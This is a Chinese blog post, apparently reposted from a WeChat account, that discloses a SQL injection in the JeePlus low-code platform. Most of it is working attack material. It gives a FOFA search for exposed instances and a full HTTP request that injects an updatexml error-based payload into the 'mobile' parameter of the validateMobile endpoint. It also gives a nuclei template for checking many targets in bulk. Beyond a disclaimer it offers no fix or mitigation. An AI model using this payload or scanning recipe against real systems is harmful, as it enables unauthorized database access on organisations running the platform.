2024年2月23日16:37:44评论45 views字数 1066阅读3分33秒阅读模式

免责声明：

本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

漏洞描述

JeePlus低代码开发平台存在SQL注入漏洞

fofa语句

app="JeePlus"

漏洞复现

打开页面

JeePlus低代码开发平台存在SQL注入漏洞

构造payload

JeePlus低代码开发平台存在SQL注入漏洞

GET /a/sys/user/validateMobile?mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%281%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
Connection: close

nuclei批量验证

JeePlus低代码开发平台存在SQL注入漏洞

id: JeePlus-SQLi

info:
  name: JeePlus低代码开发平台存在SQL注入漏洞
  author: changge
  severity: high
  description: |
    JeePlus低代码开发平台存在SQL注入漏洞
  metadata:
    fofa-query: app="JeePlus"
  reference:
    - https://127.0.0.1
  tags: auto

http:
  - raw:
      - |
        GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%281%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
        Accept: */*
        Connection: Keep-Alive


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c4ca4238a0b923820dcc509a6f75849"

github poc总汇地址：https://github.com/AYcg/poc

原文始发于微信公众号（AY长歌）：JeePlus低代码开发平台存在SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

JeePlus低代码开发平台存在SQL注入漏洞

免责声明：

漏洞描述

fofa语句

漏洞复现

打开页面

构造payload

nuclei批量验证

github poc总汇地址：https://github.com/AYcg/poc

【漏洞通告】BIG-IP Next Central Manager多个注入漏洞安全风险通告

用友U8 CRM客户关系管理系统 downloadfile 任意文件读取

用友-U8C-Cloud upload sql注入漏洞复现

漏洞预警 | Travelpayouts开放式重定向漏洞

漏洞复现-福建科立讯通信指挥调度管理平台ajax_users.php 存在SQL注入

漏洞复现-禅道身份认证绕过漏洞

用友U8-CRM客户关系管理系统downloadfile.php 任意文件读取漏洞

【0day】瑞友天翼应用虚拟化系统

QVD-2024-15263：禅道身份认证绕过漏洞

红海云ehr-RedseaPlatform-文件上传-PtFjk

发表评论

在线咨询

微信